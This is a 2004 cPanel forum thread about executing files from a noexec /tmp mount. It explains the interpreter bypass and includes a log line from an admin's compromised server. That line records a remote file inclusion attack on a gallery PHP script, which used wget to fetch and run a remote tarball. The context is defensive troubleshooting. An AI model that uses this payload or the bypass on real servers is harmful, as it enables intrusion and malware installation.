The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How to execute a file in a noexec tmp/?

Discussion in 'General Discussion' started by mikehvvc, Sep 12, 2004.

  1. mikehvvc

    mikehvvc Registered
    PartnerNOC

    Joined:
    Apr 27, 2004
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    Hello,

    I recently read a post saying it was possible for someone to execute a file in a noexec /tmp, so is this possible if so how? Thanks.



    -Mike
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Yes, it's simple.

    For example, if you copy a perl script to /tmp with noexec enabled, then this won't work:

    /tmp/script.pl

    but, this will:

    perl /tmp/script.pl

    The same goes for shell scripts, for example this won't work:

    /tmp/script.sh

    but this will:

    sh /tmp/script.sh

    It becomes only slightly more difficult with binaries in /tmp, but all you have to do is write a shell wrapper and you can then use the above.

    So, it's not much of a protection, but it is one layer in your server security structure.
     
  3. mikehvvc

    mikehvvc Registered
    PartnerNOC

    Joined:
    Apr 27, 2004
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    Chirpy,

    Thank you for your reply. The reason I asked about this is for I had a box get rooted for the second even when I locked down tmp/. Not that locking tmp/ will solve all security issues with a box, but they seem to have run the same type of exploit as before. They installed an irc app (psybnc) and other misc binaries in tmp/. I am new in investigating such matters, so if anyone has any pointers on how to track down how they got it, please let me know. I log in varies log files and seen that they down an portscan of some type. It ain't no nmap I will tell you, lol. Here is a want I found when I do a "grep wget /usr/local/apache/domlogs/* "

    /usr/local/apache/domlogs/domain.com:ip address- - [09/Sep/2004:07:21:42 -0400] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.somedomain.biz/b?&cmd=cd%20/dev/shm;wget%20www.somedomain.or/alexander/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.1" 200 558 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iOpus-I-M)"

    Anyways, if anyone have more tips on how to investigate a hack let me know. Thanks.



    -Mike
     
  4. sawbuck

    sawbuck Well-Known Member

    Joined:
    Jan 18, 2004
    Messages:
    1,367
    Likes Received:
    5
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
  5. kris1351

    kris1351 Well-Known Member

    Joined:
    Apr 18, 2003
    Messages:
    963
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Lewisville, Tx
    mod_security helps with the perl scripts running like that I believe.
     
Loading...

Share This Page